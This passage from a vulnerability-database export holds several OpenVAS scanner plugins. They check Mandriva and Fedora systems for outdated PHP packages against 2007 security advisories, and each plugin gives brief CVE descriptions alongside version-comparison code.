MDKSA-2007:089 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:089 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A heap-based buffer overflow vulnerability was found in PHP's gd\n extension. A script that could be forced to process WBMP images\n from an untrusted source could result in arbitrary code execution\n (CVE-2007-1001).\n\n A DoS flaw was found in how PHP processed a deeply nested array.\n A remote attacker could cause the PHP interpreter to crash\n by submitting an input variable with a deeply nested array\n (CVE-2007-1285).\n \n A vulnerability in the way the mbstring extension set global variables\n was discovered where a script using the mb_parse_str() function to\n set global variables could be forced to enable the register_globals\n configuration option, possibly resulting in global variable injection\n (CVE-2007-1583).\n \n A vulnerability in how PHP's mail() function processed header data was\n discovered. 
If a script sent mail using a subject header containing\n a string from an untrusted source, a remote attacker could send bulk\n email to unintended recipients (CVE-2007-1718).\n \n A buffer overflow in the sqlite_decode_function() in the bundled\n sqlite library could allow context-dependent attackers to execute\n arbitrary code (CVE-2007-1887).\n \n Updated packages have been patched to correct these issues. Also note\n that the default use of the Hardened PHP patch helped to protect\n against some of these issues prior to patching.\";\n\ntag_affected = \"php on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00025.php\");\n script_id(830059);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:089\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-1887\");\n script_name( \"Mandriva Update for php MDKSA-2007:089 (php)\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~1.2mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-24T12:57:13", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830064", "id": "OPENVAS:830064", "title": "Mandriva Update for php MDKSA-2007:090 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:090 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A heap-based buffer overflow vulnerability was found in PHP's gd\n extension. 
A script that could be forced to process WBMP images\n from an untrusted source could result in arbitrary code execution\n (CVE-2007-1001).\n\n A DoS flaw was found in how PHP processed a deeply nested array.\n A remote attacker could cause the PHP interpreter to crash\n by submitting an input variable with a deeply nested array\n (CVE-2007-1285).\n \n The internal filter module in PHP in certain instances did not properly\n strip HTML tags, which allowed a remote attacker to conduct cross-site\n scripting (XSS) attacks (CVE-2007-1454).\n \n A vulnerability in the way the mbstring extension set global variables\n was discovered where a script using the mb_parse_str() function to\n set global variables could be forced to enable the register_globals\n configuration option, possibly resulting in global variable injection\n (CVE-2007-1583).\n \n A vulnerability in how PHP's mail() function processed header data was\n discovered. If a script sent mail using a subject header containing\n a string from an untrusted source, a remote attacker could send bulk\n email to unintended recipients (CVE-2007-1718).\n \n Updated packages have been patched to correct these issues. 
Also note\n that the default use of Suhosin helped to protect against some of\n these issues prior to patching.\";\n\ntag_affected = \"php on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00026.php\");\n script_id(830064);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:090\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1454\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_name( \"Mandriva Update for php MDKSA-2007:090 (php)\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.1~0.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-04-09T11:41:47", 
"bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830064", "id": "OPENVAS:1361412562310830064", "type": "openvas", "title": "Mandriva Update for php MDKSA-2007:090 (php)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:090 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A heap-based buffer overflow vulnerability was found in PHP's gd\n extension. 
A script that could be forced to process WBMP images\n from an untrusted source could result in arbitrary code execution\n (CVE-2007-1001).\n\n A DoS flaw was found in how PHP processed a deeply nested array.\n A remote attacker could cause the PHP interpreter to crash\n by submitting an input variable with a deeply nested array\n (CVE-2007-1285).\n \n The internal filter module in PHP in certain instances did not properly\n strip HTML tags, which allowed a remote attacker to conduct cross-site\n scripting (XSS) attacks (CVE-2007-1454).\n \n A vulnerability in the way the mbstring extension set global variables\n was discovered where a script using the mb_parse_str() function to\n set global variables could be forced to enable the register_globals\n configuration option, possibly resulting in global variable injection\n (CVE-2007-1583).\n \n A vulnerability in how PHP's mail() function processed header data was\n discovered. If a script sent mail using a subject header containing\n a string from an untrusted source, a remote attacker could send bulk\n email to unintended recipients (CVE-2007-1718).\n \n Updated packages have been patched to correct these issues. 
Also note\n that the default use of Suhosin helped to protect against some of\n these issues prior to patching.\";\n\ntag_affected = \"php on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00026.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830064\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:090\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1454\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_name( \"Mandriva Update for php MDKSA-2007:090 (php)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.1~0.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, 
{"lastseen": "2017-07-25T10:56:28", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861278", "id": "OPENVAS:861278", "title": "Fedora Update for php FEDORA-2007-455", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2007-455\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"php on Fedora Core 5\";\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated webpages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts. 
The\n mod_php module enables the Apache Web server to understand and process\n the embedded PHP language in Web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00056.html\");\n script_id(861278);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:27:46 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-455\");\n script_cve_id(\"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-1001\", \"CVE-2007-0455\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2006-5465\", \"CVE-2006-4812\");\n script_name( \"Fedora Update for php FEDORA-2007-455\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mysql\", rpm:\"x86_64/php-mysql~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xml\", rpm:\"x86_64/php-xml~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-soap\", rpm:\"x86_64/php-soap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ncurses\", rpm:\"x86_64/php-ncurses~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php\", rpm:\"x86_64/php~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pdo\", rpm:\"x86_64/php-pdo~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pgsql\", rpm:\"x86_64/php-pgsql~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ldap\", rpm:\"x86_64/php-ldap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mbstring\", rpm:\"x86_64/php-mbstring~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-dba\", rpm:\"x86_64/php-dba~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-odbc\", rpm:\"x86_64/php-odbc~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-bcmath\", rpm:\"x86_64/php-bcmath~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xmlrpc\", 
rpm:\"x86_64/php-xmlrpc~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-devel\", rpm:\"x86_64/php-devel~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-snmp\", rpm:\"x86_64/php-snmp~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/php-debuginfo\", rpm:\"x86_64/debug/php-debuginfo~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-imap\", rpm:\"x86_64/php-imap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-gd\", rpm:\"x86_64/php-gd~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mbstring\", rpm:\"i386/php-mbstring~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xmlrpc\", rpm:\"i386/php-xmlrpc~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-dba\", rpm:\"i386/php-dba~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-devel\", rpm:\"i386/php-devel~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mysql\", rpm:\"i386/php-mysql~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-snmp\", rpm:\"i386/php-snmp~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xml\", rpm:\"i386/php-xml~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"i386/php-pgsql\", rpm:\"i386/php-pgsql~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-bcmath\", rpm:\"i386/php-bcmath~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-imap\", rpm:\"i386/php-imap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pdo\", rpm:\"i386/php-pdo~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-odbc\", rpm:\"i386/php-odbc~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-gd\", rpm:\"i386/php-gd~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php\", rpm:\"i386/php~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/php-debuginfo\", rpm:\"i386/debug/php-debuginfo~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-soap\", rpm:\"i386/php-soap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ncurses\", rpm:\"i386/php-ncurses~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n 